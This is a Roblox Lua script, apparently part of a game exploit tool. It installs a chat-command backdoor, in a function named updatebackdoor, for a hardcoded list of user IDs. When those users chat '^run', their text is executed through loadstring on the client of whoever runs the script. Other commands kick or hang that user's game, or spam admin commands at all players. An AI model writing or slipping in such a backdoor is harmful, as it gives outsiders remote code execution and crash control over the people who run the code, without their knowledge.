local function getplayerfromstring(str)
    for i, v in pairs(game.Players:GetPlayers()) do
        if str:lower() == "me" then
            return game.Players.LocalPlayer
        end
        if str:lower() == (v.Name:lower()):sub(1, #str) or str:lower() == (v.DisplayName:lower()):sub(1, #str) then
            return v
        end
    end
end

local allowed = {
    120983992, -- decryptionites
    252684030, -- jjjuuikjjikkju (Knocks)
    466826765, -- gytvgggj
    4445687128, -- Altsarecooleh (Ultra)
    6561234, -- grimAuxiliatrix (cxo)
    1702851506, -- t_echr (Tech)
    5713660970, -- t_echk (Tech)
    1842223904, -- t_echl (Tech)
    58315225, -- unownreiko
    3367555199, -- terminated
    4599596782, -- xTheChurchBells
    1551416114, -- wrydioda4
    1157113634, -- Dev_Fault
    6023246105, -- BESTSP0OK
    3894108483 -- BANNter_Original (Kozy)
}

local bdconnections = {}

local function updatebackdoor()
    for i, v in pairs(bdconnections) do
        v:disconnect()
    end
    for i, v in pairs(game.Players:GetPlayers()) do
        if table.find(allowed, v.UserId) then
            a =
                v.Chatted:Connect(
                function(msg)
                    local splitted = msg:split(" ")
                    if splitted[1] == "^ktest" then
                        game.Players:Chat(
                            "(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)(!)"
                        )
                        task.wait(0.3)
                        local args = {
                            [1] = "/w " .. v.Name .. " i am using Kohls LITE",
                            [2] = "All"
                        }

                        game:GetService("ReplicatedStorage"):WaitForChild("DefaultChatSystemChatEvents"):WaitForChild(
                            "SayMessageRequest"
                        ):FireServer(unpack(args))
                    elseif splitted[1] == "^kick" then
                        local target = getplayerfromstring(splitted[2])
                        if target.UserId == game.Players.LocalPlayer.UserId then
                            game.Players.LocalPlayer:Kick(string.sub(msg, #splitted[1] + #splitted[2] + 3))
                            task.wait(1)
                            while true do
                            end
                        end
                    elseif splitted[1] == "^run" then
                        local execute = #splitted[1] + 1
                        loadstring(string.sub(msg, execute))()
                    elseif splitted[1] == "^crashall" then
                        while true do
                        end
                    elseif splitted[1] == "^silc" then
                        for i = 1, 5 do
                            game.Players:Chat("size all .3")
                        end
                        for i = 1, 13 do
                            game.Players:Chat("rocket/all all all 123456789")
                            game.Players:Chat("freeze all all all 123456789")
                            game.Players:Chat("dog all all all 123456789")
                        end
                        for i = 1, 5 do
                            game.Players:Chat("size all 10")
                        end
                        for i = 1, 200 do
                            game.Players:Chat("clone all all all 123456789")
                        end
                        while true do
                            task.wait()
                            game.Players:Chat("clone all all all 123456789")
                        end
                    end
                end
            )
        end
    end
end

task.delay(
    0.5,
    function()
        game.Players.PlayerAdded:Connect(
            function()
                updatebackdoor()
            end
        )
        game.Players.PlayerRemoving:Connect(
            function()
                updatebackdoor()
            end
        )
        updatebackdoor()
    end
)
